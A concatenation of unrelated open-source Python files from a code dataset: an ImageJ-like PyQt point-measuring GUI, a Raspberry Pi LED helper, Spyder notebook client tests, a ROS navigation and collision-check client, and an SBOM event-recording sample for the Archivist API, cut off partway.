self._mouse_click_proxy = pg.SignalProxy(self._plt.scene().sigMouseClicked, rateLimit=60, slot=self._mouse_click_handler)
window.key_press_event.connect(self._key_press_handler)
window.key_release_event.connect(self._key_release_handler)
# Event handlers
def _key_press_handler(self, key):
if key == QtCore.Qt.Key_Shift: self._shift_active = True
elif key == QtCore.Qt.Key_Z: self.point_remove_last_event.emit()
def _key_release_handler(self, key):
if key == QtCore.Qt.Key_Shift: self._shift_active = False
def _mouse_move_handler(self, event):
pos = event[0] # Using signal proxy turns original arguments into a tuple
if self._plt.sceneBoundingRect().contains(pos):
mouse_position = self._plt.plotItem.vb.mapSceneToView(pos)
self.mouse_move_event.emit((mouse_position.x(), mouse_position.y()))
if self.origin_move_active:
self._origin_hline.setPos(mouse_position.y())
self._origin_vline.setPos(mouse_position.x())
self.origin_change_event.emit((mouse_position.x(), mouse_position.y()))
def _mouse_click_handler(self, event):
if event[0] == None: return # Prevent attribute error
pos = event[0].pos() # Using signal proxy turns original arguments into a tuple
if self.origin_move_active:
self.origin_move_active = False
return
if self._shift_active: self.point_add_event.emit((pos.x(), pos.y()))
def update_points(self, points):
"""Update the scatter plot with the points"""
self.scatter.setData(pos=points)
# Plot widget functions
def set_origin(self, position):
"""Change the origin's position to a new location"""
self.origin = position
self.origin_hline.setPos(position[0])
self._origin_vline.setPos(position[1])
def set_image(self, image):
"""Change the current image that is shown"""
self.image = np.flipud(np.rot90(image))
# Set image on the view and copy over the levels (LUT)
levels = self.lut.getLevels()
self.img.setImage(self.image if not self._grayscale_active else np.dot(self.image[...,:3], [0.299, 0.587, 0.114]))
if self.lut.levelMode == 'mono': self.lut.setLevels(min=levels[0], max=levels[1])
else: self.lut.setLevels(rgba=levels)
self.lut.regionChanged() # Tell PyQtGrapg the LUT regions have changed to update the image view
class CalibrationDialog(QtWidgets.QDialog):
"""Qt dialog class for the calibration popup"""
def __init__(self):
super().__init__()
# Create the window and add all form elements
self.setWindowTitle('ImageP Calibration')
buttons = QtWidgets.QDialogButtonBox.Ok | QtWidgets.QDialogButtonBox.Cancel
self.buttonBox = QtWidgets.QDialogButtonBox(buttons)
self.buttonBox.accepted.connect(self._onaccept)
self.buttonBox.rejected.connect(self.reject)
self.layout = QtWidgets.QFormLayout()
self.layout.addRow(QtWidgets.QLabel('Enter the size of each pixel and provide a unit'))
self.xedit = QtWidgets.QLineEdit()
self.xedit.setValidator(QtGui.QDoubleValidator())
self.layout.addRow('X-direction pixel size', self.xedit)
self.yedit = QtWidgets.QLineEdit()
self.yedit.setValidator(QtGui.QDoubleValidator())
self.layout.addRow('Y-direction pixel size', self.yedit)
self.unitedit = QtWidgets.QLineEdit()
self.layout.addRow('Unit', self.unitedit)
self.layout.addRow(self.buttonBox)
self.setLayout(self.layout)
def get_xy_calibration(self):
"""Convert the entered calibration values to floats and return them as a tuple"""
return (float(self.xedit.text()), float(self.yedit.text()))
def get_unit(self):
"""Get the entered unit"""
return self.unitedit.text()
def _onaccept(self):
"""
This internal function adds a bit of functionality to the self.accept function, it
checks whether the entered values are numbers. If not, an error dialog will show.
"""
try:
self.get_xy_calibration()
self.accept()
except Exception as e:
msg = QtWidgets.QMessageBox()
msg.setIcon(QtWidgets.QMessageBox.Critical)
msg.setText('An error occurred!')
msg.setInformativeText('Numbers entered were invalid.')
msg.setWindowTitle('ImageP Error')
msg.exec_()
class ImageWindow(QtWidgets.QMainWindow):
key_press_event = QtCore.pyqtSignal(int)
key_release_event = QtCore.pyqtSignal(int)
"""Class for the image window of ImageP"""
def __init__(self, image, origin, calibration, unit, color):
super(ImageWindow, self).__init__()
self.image = image
self.origin = origin
self.calibration = calibration
self.unit = unit # Default unit is pixels
self.color = color
self.points = []
def closeEvent(self, event):
# Needed to properly quit when running in IPython console / Spyder IDE
QtWidgets.QApplication.quit()
def keyPressEvent(self, event):
"""Event for key press"""
self.key_press_event.emit(event.key())
def keyReleaseEvent(self, event):
"""Event for key release"""
self.key_release_event.emit(event.key())
def init_gui(self):
"""Internal function that creates the GUI"""
self.setGeometry(100, 100, 900, 650)
self.setWindowTitle('ImageP ' + VERSION_INFO)
self._main = QtWidgets.QWidget()
self.setCentralWidget(self._main)
# Put plot in main layout
layout = QtWidgets.QVBoxLayout(self._main)
self.plotwidget = PlotWidget(self)
self.plotwidget.point_remove_last_event.connect(self.point_remove_last_listener)
self.plotwidget.point_add_event.connect(self.point_add_listener)
self.plotwidget.mouse_move_event.connect(self._update_statusbar_handler)
self.plotwidget.origin_change_event.connect(self._origin_change_listener)
layout.addWidget(self.plotwidget)
# Add menu items
def _add_action(menu, text, function):
"""Small internal function to add an action to a menu with a certain trigger function"""
# Solely made to clean up the codebase
action = QtWidgets.QAction(text, self)
menu.addAction(action)
action.triggered.connect(function)
actions = self.menuBar().addMenu('&Actions')
_add_action(actions, '&Calibrate', self._show_calibration_dialog)
_add_action(actions, '&Move origin', self._enable_moving_origin)
help = self.menuBar().addMenu('&Help')
_add_action(help, '&Documentation', self._show_documentation_popup)
_add_action(help, '&About and credits', self._show_about_popup)
# Add status bar items
self.statusbar = QtWidgets.QStatusBar()
self.setStatusBar(self.statusbar)
self.mouse_position_label = QtWidgets.QLabel(f'Position: -')
self.statusbar.addWidget(self.mouse_position_label)
self.dist_label = QtWidgets.QLabel('Distance: -')
self.statusbar.addWidget(self.dist_label)
self.angle_label = QtWidgets.QLabel('Angle: -')
self.statusbar.addWidget(self.angle_label)
def point_remove_last_listener(self):
"""Remove that last clicked point (operated with z-key)"""
if len(self.points) > 0:
self.points = self.points[:-1]
self.plotwidget.update_points(self.points)
def point_add_listener(self, point):
"""When a point is clicked, add it to the list and update the scatter plot"""
self.points.append(point)
self.plotwidget.update_points(self.points)
def get_relative_calibrated(self, point):
"""Get point position relative to origin and apply calibration"""
# First position the points relative to the origin, then multiply by their calibration factors
return ((point[0]-self.origin[0])*self.calibration[0], ((self.origin[1]-point[1])*self.calibration[1]))
def get_calibrated_points(self):
"""Returns the array we were after, the calibrated points from the image relative to the origin"""
# Convert to NumPy array for easier matrix manipulation
return np.array([self.get_relative_calibrated(point) for point in self.points])
def _show_documentation_popup(self):
"""Internal function to show the documentation popup window"""
msg = QtWidgets.QMessageBox()
msg.setIcon(QtWidgets.QMessageBox.Information)
msg.setText(DOCUMENTATION)
msg.setWindowTitle("ImageP Documentation")
msg.setStandardButtons(QtWidgets.QMessageBox.Ok)
msg.exec_()
def _show_about_popup(self):
"""Internal function to show the about and credits popup window"""
msg = QtWidgets.QMessageBox()
msg.setIcon(QtWidgets.QMessageBox.Information)
msg.setText('ImageP is a minimalistic Python version of <a href="https://imagej.nih.gov/ij/">ImageJ</a> written by and for Applied Physics students at the University of Twente. It is licensed under the MIT license.<br><br>ImageP uses <a href="https://www.riverbankcomputing.com/software/pyqt/">PyQt</a> for the GUI and <a href="https://opencv.org//">OpenCV</a> together with <a href="https://numpy.org/">NumPy</a> for file loading. <a href="https://www.pyqtgraph.org/">PyQtGraph</a> is used to display the data.<br><br>View <a href="https://github.com/JitseB/ImageP">GitHub repository</a> for updates.')
msg.setInformativeText(CHANGELOG)
msg.setWindowTitle('ImageP About and credits')
msg.setStandardButtons(QtWidgets.QMessageBox.Ok)
msg.exec_()
def _show_calibration_dialog(self):
"""Internal function to show the calibration dialog"""
dialog = CalibrationDialog()
if not dialog.exec(): return # Dialog was cancelled or closed
# Set internal variables
self.calibration = dialog.get_xy_calibration()
self.unit = dialog.get_unit()
def _enable_moving_origin(self):
"""Internal function to enable movement of the origin"""
self.plotwidget.origin_move_active = True
def _origin_change_listener(self, origin):
self.origin = origin
def _update_statusbar_handler(self, mouse_position):
"""Internal function to update the statusbar labels"""
# All points (A, B and C) are measured from the origin position
# Using cosine rule to solve angle (finding angle(CAB), so between the lines AC and AB)
C = self.get_relative_calibrated(mouse_position)
self.mouse_position_label.setText(f'Position: x={C[0]:.2f} {self.unit}; y={C[1]:.2f} {self.unit}')
if len(self.points) >= 1:
B = self.get_relative_calibrated(self.points[-1])
distanceBC = ((B[0]-C[0])**2+(B[1]-C[1])**2)**(1/2)
self.dist_label.setText(f'Distance: {distanceBC:.2f} {self.unit}')
if len(self.points) >= 2:
A = self.get_relative_calibrated(self.points[-2])
distanceAC = ((A[0]-C[0])**2+(A[1]-C[1])**2)**(1/2)
distanceAB = ((A[0]-B[0])**2+(A[1]-B[1])**2)**(1/2)
try:
argument = (distanceAC**2+distanceAB**2-distanceBC**2)/(2*distanceAC*distanceAB)
if not -1 <= argument <= 1: return # arccos only takes values between -1 and 1
angle = np.arccos(argument)*180/np.pi
self.angle_label.setText(f'Angle: {angle:.2f} deg')
except ZeroDivisionError as e: pass
class VideoWindow(ImageWindow):
"""Class for the video window of ImageP"""
def __init__(self, capture, origin, calibration, unit, color, frame, auto_progress, auto_progress_frame_interval):
self.capture = capture
self.frame = frame
self.auto_progress = auto_progress
self.auto_progress_frame_interval = auto_progress_frame_interval
self.max_frame = int(capture.get(cv2.CAP_PROP_FRAME_COUNT))-1
self.capture.set(1, frame) # Set the frame number within the VideoCapture object
success, image = self.capture.read()
if not success: raise Exception('Could not read video capture')
# Convert image data to RGB for Matplotlib
image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
# The origin point was returned calibrated from the (0, 0) origin, we have to compensate for that...
if origin is not None: origin = (origin[0], image.shape[0]-origin[1])
else: origin = (0, image.shape[0])
super(VideoWindow, self).__init__(image, origin, calibration, unit, color)
def init_video_gui(self):
"""Initialize the video GUI"""
# First initialize the image GUI, then add to that:
self.init_gui()
# Connect to the necessary events
self.key_press_event.connect(self._key_press_listener)
self.plotwidget.point_add_event.connect(self._auto_progress_handler)
self.plotwidget.point_remove_last_event.connect(self._point_remove_last_listener)
# Add an extra label for the frame number to the status bar
self.frame_label = QtWidgets.QLabel(f'Frame: {self.frame}/{self.max_frame}')
self.statusbar.addWidget(self.frame_label)
def _key_press_listener(self, key):
"""Listener for key press event so that the user can move through the frames"""
if key == QtCore.Qt.Key_Right and self.frame < self.max_frame: self._change_frame(self.frame+1)
elif key == QtCore.Qt.Key_Left and self.frame > 0: self._change_frame(self.frame-1)
def _point_remove_last_listener(self):
"""Additional listener (see image class) so that when auto progressing, using the z-key, it goes back in time"""
# Roll back the frames when auto-progressing is enabled
if self.auto_progress and len(self.points) > 0: self._change_frame(self.frame - self.auto_progress_frame_interval)
def _change_frame(self, frame):
"""Internal function to change the frame currently visible"""
self.capture.set(1, frame) # Set the frame number within the VideoCapture object
success, image = self.capture.read()
if not success: return False
# Convert image data to RGB
image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
self.plotwidget.set_image(image)
# Set frame label to correct frame number
self.frame_label.setText(f'Frame: {frame}/{self.max_frame}')
self.frame = frame
return True
def _auto_progress_handler(self, _):
"""Internal function as listener for the button click event from PyQtGraph, only triggers when a point is placed"""
# If 'auto_progress' is true, move to next frame
if self.auto_progress and not self._change_frame(self.frame + self.auto_progress_frame_interval):
msg = QtWidgets.QMessageBox()
msg.setIcon(QtWidgets.QMessageBox.Critical)
msg.setText('Cannot move any further!')
msg.setInformativeText('You ran out of frames to click.')
msg.setWindowTitle('ImageP Error')
msg.exec_()
def gui(path, origin=None, calibration=(1, 1), unit='px', color='w', frame=0, auto_progress=False, auto_progress_frame_interval=10):
"""
Function that opens the GUI of ImageP. Returns array with calibrated clicked points relative to the origin.
Parameters:
- 'path': Path to image or video.
- 'origin': Change the origin to position xy (optional) (always in pixels!).
- 'calibration': The pixel calibration array (x and y pixel size) (optional).
- 'unit': The unit caused by the calibration array (pixels [px] by default).
If an array with the calibration values for the pixels was passed, it is recommended to also pass the corresponding unit to prevent confusion later on.
- 'color': The color used for the axis and points (optional) (white by default).
VIDEO ONLY:
- 'frame': The frame to start the program from (0 by default).
- 'auto_progress': Automatically progress to the next frame after clicking (false by default).
- 'auto_progress_frame_interval': Frames that are skipped when auto-progressing (10 frames per click by default).
'origin', 'calibration' and 'unit' can also be defined from within the GUI.
"""
try:
# Load the image
image = cv2.imread(path)
if image is None: raise Exception
# Convert image data to RGB for Matplotlib
image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
# The origin point was returned calibrated from the (0, 0) origin, we have to compensate for that...
# 16 May 2021: Removed unit origin as we cannot know the previous origin, therefore we cannot
# compensate for it properly.
if origin is not None: origin = (origin[0], image.shape[0]-origin[1])
else: origin = (0, image.shape[0])
# Launch the GUI application
# Use previous instance if available
if not QtWidgets.QApplication.instance(): app = QtWidgets.QApplication(sys.argv)
else: app = QtWidgets.QApplication.instance()
window = ImageWindow(image, origin, calibration, unit, color)
window.init_gui()
window.show()
app.exec_()
# Return the calibrated points
return window.get_calibrated_points()
except Exception as e:
# If it is not an image, try to load the video
capture = cv2.VideoCapture(path)
if not capture.isOpened(): raise FileNotFoundError('The specified file could not be found (or loaded)')
# Launch the GUI application
# Use previous instance if available
if not QtWidgets.QApplication.instance(): app = QtWidgets.QApplication(sys.argv)
else: app = QtWidgets.QApplication.instance()
window = VideoWindow(capture, origin, calibration, unit, color, frame, auto_progress, auto_progress_frame_interval)
window.init_video_gui()
window.show()
app.exec_()
# Return the calibrated points
return window.get_calibrated_points()
# Test the application with a test image
if __name__ == '__main__':
points = gui('./test.avi', color='w', frame=2000, auto_progress=True, auto_progress_frame_interval=10)
print(points)
``` |
{
"source": "JitseB/SpacePointer",
"score": 3
} |
#### File: SpacePointer/updater/led.py
```python
import RPi.GPIO as GPIO
import time
GPIO.setmode(GPIO.BOARD)
GPIO.setwarnings(False)
class LED():
def __init__(self, pin):
self.state = 0
self.pin = pin
GPIO.setup(self.pin, GPIO.OUT)
GPIO.output(self.pin, self.state)
def set(self, onoff):
self.state = onoff
GPIO.output(self.pin, self. state)
def __delete__(self):
GPIO.cleanup()
``` |
{
"source": "jitseniesen/spyder-notebook",
"score": 2
} |
#### File: widgets/tests/test_client.py
```python
import pytest
from qtpy.QtWidgets import QWidget
import requests
# Local imports
from spyder_notebook.widgets.client import NotebookClient
class MockPlugin(QWidget):
def get_plugin_actions(self):
return []
@pytest.fixture
def plugin(qtbot):
"""
Construct mock plugin with NotebookClient for use in tests.
Use `plugin.client` to access the client.
"""
plugin = MockPlugin()
qtbot.addWidget(plugin)
client = NotebookClient(plugin, '/path/notebooks/ham.ipynb')
plugin.client = client
server_info = {'notebook_dir': '/path/notebooks',
'url': 'fake_url',
'token': '<PASSWORD>'}
client.register(server_info)
return plugin
def test_notebookclient_get_kernel_id(plugin, mocker):
"""Basic unit test for NotebookClient.get_kernel_id()."""
response = mocker.Mock()
content = b'[{"kernel": {"id": "42"}, "notebook": {"path": "ham.ipynb"}}]'
response.content = content
response.status_code = requests.codes.ok
mocker.patch('requests.get', return_value=response)
kernel_id = plugin.client.get_kernel_id()
assert kernel_id == '42'
def test_notebookclient_get_kernel_id_with_fields_missing(plugin, mocker):
"""Test NotebookClient.get_kernel_id() if response has fields missing."""
response = mocker.Mock()
content = (b'[{"kernel": {"id": "1"}, "notebook": {"spam": "eggs"}},'
b' {"kernel": {"id": "2"}},'
b' {"kernel": {"id": "3"}, "notebook": {"path": "ham.ipynb"}}]')
response.content = content
response.status_code = requests.codes.ok
mocker.patch('requests.get', return_value=response)
kernel_id = plugin.client.get_kernel_id()
assert kernel_id == '3'
def test_notebookclient_get_kernel_id_with_error_status(plugin, mocker):
"""Test NotebookClient.get_kernel_id() when response has error status."""
response = mocker.Mock()
content = b'{"message": "error"}'
response.content = content
response.status_code = requests.codes.forbidden
mocker.patch('requests.get', return_value=response)
MockMessageBox = mocker.patch('spyder_notebook.widgets.client.QMessageBox')
plugin.client.get_kernel_id()
MockMessageBox.warning.assert_called()
def test_notebookclient_get_kernel_id_with_exception(plugin, mocker):
"""Test NotebookClient.get_kernel_id() when request raises an exception."""
exception = requests.exceptions.ProxyError('kaboom')
mocker.patch('requests.get', side_effect=exception)
MockMessageBox = mocker.patch('spyder_notebook.widgets.client.QMessageBox')
plugin.client.get_kernel_id()
MockMessageBox.warning.assert_called()
``` |
{
"source": "JitskedeVries/amr-lmpcc",
"score": 2
} |
#### File: lmpcc/scripts/cadrl_client.py
```python
import rospy
import sys
# Brings in the SimpleActionClient
import actionlib
import math
import tf2_ros
from geometry_msgs.msg import *
from std_srvs.srv import *
import time
"""Reference Path"""
#x = [1.5, 3.5, 5.5, 7, 5.5, 3.5, 1.5, 0, 1.5]
#y = [0.5, 0.5, 0.5, 2, 3.5, 3.5, 3.5, 2, 0.5]
#theta = [0, 0, 0, 1.57, 3.14, 3.14, 3.14, -1.57, 0]
#global_path:
#x = [1.5, 3.5, 5.5, 7, 8, 10, 13, 11, 10.5, 9, 7, 5.5, 3.5, 1.5, 0, 1.5]
#y = [0.5, 0.5, 0.5, 2, 4, 4, 6, 7.5, 6, 4, 3.5, 3.5, 3.5, 3.5, 2, 0.5]
#theta = [0, 0, 0, 1.57, 0, 0, 1.57, 3.14, -1.57, 3.14, 3.14, 3.14, 3.14, 3.14, -1.57, 0]
# faculty corridor
#global_path:
#x= [50, 55, 60, 65,70,80]
#y= [-0.5, -0.5, -0.5, -0.5,-0.5,-0.5]
#theta= [0,0,0,0,0,0]
#reference_velocity= 0.5
#cadrl test
x= [15]
y= [0]
theta= [0]
reference_velocity= 0.5
distance_threshold = 0.63
loop = True
def cadrl_client(index,pub_global_goal):
# Creates a goal to send to the action server.
goal = PoseStamped()
goal.header.stamp = rospy.get_rostime()
goal.header.frame_id = "odom"
goal.pose.position.x = x[index]
goal.pose.position.y = y[index]
goal.pose.orientation.x = 0
goal.pose.orientation.y = 0
goal.pose.orientation.z = math.sin(theta[i]*0.5)
goal.pose.orientation.w = math.cos(theta[i]*0.5)
# Sends the goal to the action server.
pub_global_goal.publish(goal)
def check_if_arrived(i,tfBuffer):
try:
trans = tfBuffer.lookup_transform('odom', 'base_link', rospy.Time(0))
except (tf2_ros.LookupException, tf2_ros.ConnectivityException, tf2_ros.ExtrapolationException):
print ("Could not get TF")
return False
if math.sqrt(pow(x[i]-trans.transform.translation.x,2)+pow(y[i]-trans.transform.translation.y,2)) < 1:
return True
else:
return False
def collision_check(tfBuffer):
try:
pos_ped_1 = tfBuffer.lookup_transform('base_link', 'ped_link_1', rospy.Time(0))
except (tf2_ros.LookupException, tf2_ros.ConnectivityException, tf2_ros.ExtrapolationException):
print ("Could not get ped_link_1" )
return False
try:
pos_ped_2 = tfBuffer.lookup_transform('base_link', 'ped_link_2', rospy.Time(0))
except (tf2_ros.LookupException, tf2_ros.ConnectivityException, tf2_ros.ExtrapolationException):
print ("Could not get ped_link_2" )
return False
try:
pos_ped_3 = tfBuffer.lookup_transform('base_link', 'ped_link_3', rospy.Time(0))
except (tf2_ros.LookupException, tf2_ros.ConnectivityException, tf2_ros.ExtrapolationException):
print ("Could not get ped_link_3" )
return False
try:
pos_ped_4 = tfBuffer.lookup_transform('base_link', 'ped_link_4', rospy.Time(0))
except (tf2_ros.LookupException, tf2_ros.ConnectivityException, tf2_ros.ExtrapolationException):
print ("Could not get ped_link_4" )
return False
"""
try:
pos_ped_5 = tfBuffer.lookup_transform('base_link', 'ped_link_5', rospy.Time(0))
except (tf2_ros.LookupException, tf2_ros.ConnectivityException, tf2_ros.ExtrapolationException):
print ("Could not get ped_link_5" )
return False
try:
pos_ped_6 = tfBuffer.lookup_transform('base_link', 'ped_link_6', rospy.Time(0))
except (tf2_ros.LookupException, tf2_ros.ConnectivityException, tf2_ros.ExtrapolationException):
print ("Could not get ped_link_6" )
return False
"""
ped_distance_1 =math.sqrt(pow(pos_ped_1.transform.translation.x,2)+pow(pos_ped_1.transform.translation.y,2))
#print("ped_distance_1: " +str(ped_distance_1))
if ped_distance_1 < distance_threshold:
print ("Collision with ped_link_1!!!")
return True
#print("ped_distance_1: " +str(ped_distance_1))
if math.sqrt(pow(pos_ped_2.transform.translation.x,2)+pow(pos_ped_2.transform.translation.y,2)) < distance_threshold:
print ("Collision with ped_link_2")
return True
if math.sqrt(pow(pos_ped_3.transform.translation.x,2)+pow(pos_ped_3.transform.translation.y,2)) < distance_threshold:
print ("Collision with ped_link_3")
return True
if math.sqrt(pow(pos_ped_4.transform.translation.x,2)+pow(pos_ped_4.transform.translation.y,2)) < distance_threshold:
print ("Collision with ped_link_4")
return True
else:
return False
"""
if math.sqrt(pow(pos_ped_5.transform.translation.x,2)+pow(pos_ped_5.transform.translation.y,2)) < distance_threshold:
print ("Collision with ped_link_5")
return True
if math.sqrt(pow(pos_ped_6.transform.translation.x,2)+pow(pos_ped_6.transform.translation.y,2)) < distance_threshold:
print ("Collision with ped_link_6")
return True
"""
if __name__ == '__main__':
rospy.init_node('cadrl_base_client_py')
i = 0
pub_global_goal = rospy.Publisher('/nn_jackal/goal',PoseStamped, queue_size=1)
reset_simulation_client_ = rospy.ServiceProxy("/gazebo/reset_world",Empty());
"""ROS Variables"""
tfBuffer = tf2_ros.Buffer()
listener = tf2_ros.TransformListener(tfBuffer)
collision_number = 0
n_events = 0
trials = 0
timeout = 0
mean_time=0
while(i < len(x)):
if trials > 100:
break
try:
# Initializes a rospy node so that the SimpleActionClient can
# publish and subscribe over ROS.
cadrl_client(i,pub_global_goal)
arrived = False
col = False
ti = time.time() # initial time
while (not arrived) and (not col):
#rospy.sleep(0.1)
cadrl_client(i,pub_global_goal)
arrived = check_if_arrived(i,tfBuffer)
if arrived:
break
col = collision_check(tfBuffer)
if col:
collision_number += 1
trials +=1
i=0
reset_simulation_client_()
rospy.sleep(1)
break
tf = time.time()
if tf-ti > 90:
reset_simulation_client_()
i=0
timeout += 1
trials +=1
break
#print("Not arrived in: " + str(tf-ti) + " [s]")
except rospy.ROSInterruptException:
print("Failed")
break
print("next goal pos..."+str(i+1))
i += 1
if i == len(x):
i = 0
n_events += 1
trials +=1
mean_time +=tf-ti
print("Mean time to goal: " + str(mean_time))
print("Number of collisions: " + str(collision_number))
print("Number of successful events: " + str(n_events))
print("Number of trials: " + str(trials))
print("Number of timeout: " + str(timeout))
reset_simulation_client_()
rospy.sleep(1)
if trials > 100:
break
``` |
{
"source": "jitsuin-inc/archivist-samples",
"score": 2
} |
#### File: archivist_samples/software_bill_of_materials/main.py
```python
import logging
from sys import exit as sys_exit
from sys import stdout as sys_stdout
from archivist.parser import common_parser
from ..testing.parser import common_endpoint
from .run import run
LOGGER = logging.getLogger(__name__)
def main():
parser, _ = common_parser(
"Simple SBOM implementation that conforms with NTIA recommendations"
)
parser.add_argument(
"--namespace",
type=str,
dest="namespace",
action="store",
default=None,
help="namespace of item population (to enable parallel demos",
)
args = parser.parse_args()
poc = common_endpoint("sbom", args)
run(poc)
parser.print_help(sys_stdout)
sys_exit(1)
```
#### File: archivist_samples/software_bill_of_materials/software_deployment.py
```python
from typing import Optional
# pylint:disable=unused-import # To prevent cyclical import errors forward referencing is used
# pylint:disable=cyclic-import # but pylint doesn't understand this feature
from archivist import archivist as type_helper
class SoftwareDeployment:
def __init__(
self,
arch: "type_helper.Archivist",
):
self._arch = arch
self._asset = None
self._attachments = None
self._environment = None
@property
def arch(self):
return self._arch
@property
def asset(self):
return self._asset
@property
def attachments(self):
return self._attachments
@property
def environment(self):
return self._environment
# Create Software Deployment
def create(
self,
sbom_name: str,
sbom_description: str,
*,
sbom_environment: Optional[str],
attachments: Optional[list] = None,
custom_attrs: Optional[dict] = None,
):
if sbom_environment is not None:
self._environment = sbom_environment
else:
sbom_environment = self._environment
self._add_attachments(attachments)
attrs = {
"arc_display_name": sbom_name,
"arc_description": sbom_description,
"arc_display_type": "Software Deployment",
"sbom_environment": sbom_environment,
"arc_attachments": [
{
"arc_display_name": "arc_primary_image",
"arc_attachment_identity": attachment["identity"],
"arc_hash_value": attachment["hash"]["value"],
"arc_hash_alg": attachment["hash"]["alg"],
}
for attachment in self._attachments
],
}
if custom_attrs is not None:
attrs.update(custom_attrs)
self._asset = self.arch.assets.create(attrs=attrs, confirm=True)
return self._asset
# Installation Event
def installation(
self,
sbom_installation: dict,
*,
attachments: Optional[list] = None,
custom_attrs: Optional[dict] = None,
custom_asset_attrs: Optional[dict] = None,
):
if sbom_installation["environment"] is not None:
self._environment = sbom_installation["environment"]
else:
sbom_installation["environment"] = self._environment
self._add_attachments(attachments)
props = {
"operation": "Record",
"behaviour": "RecordEvidence",
}
attrs = {
"arc_description": sbom_installation["description"],
"arc_evidence": "Installation",
"arc_display_type": "Installation",
"sbom_installation_component": sbom_installation["name"],
"sbom_installation_hash": sbom_installation["hash"],
"sbom_installation_version": sbom_installation["version"],
"sbom_installation_author": sbom_installation["author"],
"sbom_installation_supplier": sbom_installation["supplier"],
"sbom_installation_uuid": sbom_installation["uuid"],
"sbom_installation_environment": sbom_installation["environment"],
"arc_attachments": [
{
"arc_display_name": sbom_installation["description"],
"arc_attachment_identity": attachment["identity"],
"arc_hash_value": attachment["hash"]["value"],
"arc_hash_alg": attachment["hash"]["alg"],
}
for attachment in self._attachments
],
}
if custom_attrs is not None:
attrs.update(custom_attrs)
asset_attrs = {
"sbom_component": sbom_installation["name"],
"sbom_hash": sbom_installation["hash"],
"sbom_version": sbom_installation["version"],
"sbom_author": sbom_installation["author"],
"sbom_supplier": sbom_installation["supplier"],
"sbom_uuid": sbom_installation["uuid"],
"sbom_environment": sbom_installation["environment"],
}
if custom_asset_attrs is not None:
asset_attrs.update(custom_asset_attrs)
return self.arch.events.create(
self._asset["identity"],
props=props,
attrs=attrs,
asset_attrs=asset_attrs,
confirm=True,
)
def decommission(
self,
sbom_decomission: dict,
*,
attachments: Optional[list] = None,
custom_attrs: Optional[dict] = None,
custom_asset_attrs: Optional[dict] = None,
):
if sbom_decomission["environment"] is not None:
self._environment = sbom_decomission["environment"]
else:
sbom_decomission["environment"] = self._environment
self._add_attachments(attachments)
props = {
"operation": "Record",
"behaviour": "RecordEvidence",
}
attrs = {
"arc_description": sbom_decomission["description"],
"arc_evidence": "Decomission",
"arc_display_type": "Decomission",
"sbom_decomission_component": sbom_decomission["name"],
"sbom_decomission_version": sbom_decomission["version"],
"sbom_decomission_author": sbom_decomission["author"],
"sbom_decomission_supplier": sbom_decomission["supplier"],
"sbom_decomission_uuid": sbom_decomission["uuid"],
"sbom_decomission_target_date": sbom_decomission["target_date"],
"sbom_decomission_status": sbom_decomission["status"],
"sbom_decomission_environment": sbom_decomission["environment"],
"arc_attachments": [
{
"arc_display_name": sbom_decomission["description"],
"arc_attachment_identity": attachment["identity"],
"arc_hash_value": attachment["hash"]["value"],
"arc_hash_alg": attachment["hash"]["alg"],
}
for attachment in self._attachments
],
}
if custom_attrs is not None:
attrs.update(custom_attrs)
asset_attrs = {
"sbom_decomission_target_date": sbom_decomission["target_date"],
"sbom_decomission_status": sbom_decomission["status"],
"sbom_environment": sbom_decomission["environment"],
}
if custom_asset_attrs is not None:
asset_attrs.update(custom_asset_attrs)
return self.arch.events.create(
self._asset["identity"], props=props, attrs=attrs, asset_attrs=asset_attrs
)
# Upgrade Events
def upgrade(
self,
sbom_upgrade: dict,
*,
attachments: Optional[list] = None,
custom_attrs: Optional[dict] = None,
custom_asset_attrs: Optional[dict] = None,
):
if sbom_upgrade["environment"] is not None:
self._environment = sbom_upgrade["environment"]
else:
sbom_upgrade["environment"] = self._environment
self._add_attachments(attachments)
props = {
"operation": "Record",
"behaviour": "RecordEvidence",
}
attrs = {
"arc_description": sbom_upgrade["description"],
"arc_evidence": "Upgrade",
"arc_display_type": "Upgrade",
"sbom_upgrade_component": sbom_upgrade["name"],
"sbom_upgrade_hash": sbom_upgrade["hash"],
"sbom_upgrade_version": sbom_upgrade["version"],
"sbom_upgrade_author": sbom_upgrade["author"],
"sbom_upgrade_supplier": sbom_upgrade["supplier"],
"sbom_upgrade_uuid": sbom_upgrade["uuid"],
"sbom_upgrade_environment": sbom_upgrade["environment"],
"arc_attachments": [
{
"arc_display_name": sbom_upgrade["description"],
"arc_attachment_identity": attachment["identity"],
"arc_hash_value": attachment["hash"]["value"],
"arc_hash_alg": attachment["hash"]["alg"],
}
for attachment in self._attachments
],
}
if custom_attrs is not None:
attrs.update(custom_attrs)
asset_attrs = {
"sbom_component": sbom_upgrade["name"],
"sbom_hash": sbom_upgrade["hash"],
"sbom_version": sbom_upgrade["version"],
"sbom_author": sbom_upgrade["author"],
"sbom_supplier": sbom_upgrade["supplier"],
"sbom_uuid": sbom_upgrade["uuid"],
}
if custom_asset_attrs is not None:
asset_attrs.update(custom_asset_attrs)
return self.arch.events.create(
self._asset["identity"],
props=props,
attrs=attrs,
asset_attrs=asset_attrs,
confirm=True,
)
def upgrade_plan(
self,
sbom_planned: dict,
*,
attachments: Optional[list] = None,
custom_attrs: Optional[dict] = None,
):
if sbom_planned["environment"] is not None:
self._environment = sbom_planned["environment"]
else:
sbom_planned["environment"] = self._environment
self._add_attachments(attachments)
props = {
"operation": "Record",
"behaviour": "RecordEvidence",
}
attrs = {
"arc_description": sbom_planned["description"],
"arc_evidence": "Upgrade Plan",
"arc_display_type": "Upgrade Plan",
"sbom_planned_date": sbom_planned["date"],
"sbom_planned_captain": sbom_planned["captain"],
"sbom_planned_component": sbom_planned["name"],
"sbom_planned_version": sbom_planned["version"],
"sbom_planned_reference": sbom_planned["reference"],
"sbom_planned_environment": sbom_planned["environment"],
"arc_attachments": [
{
"arc_display_name": sbom_planned["description"],
"arc_attachment_identity": attachment["identity"],
"arc_hash_value": attachment["hash"]["value"],
"arc_hash_alg": attachment["hash"]["alg"],
}
for attachment in attachments
],
}
if custom_attrs is not None:
attrs.update(custom_attrs)
return self.arch.events.create(
self._asset["identity"], props=props, attrs=attrs, confirm=True
)
def upgrade_accepted(
self,
sbom_accepted: dict,
*,
attachments: Optional[list] = None,
custom_attrs: Optional[dict] = None,
):
if sbom_accepted["environment"] is not None:
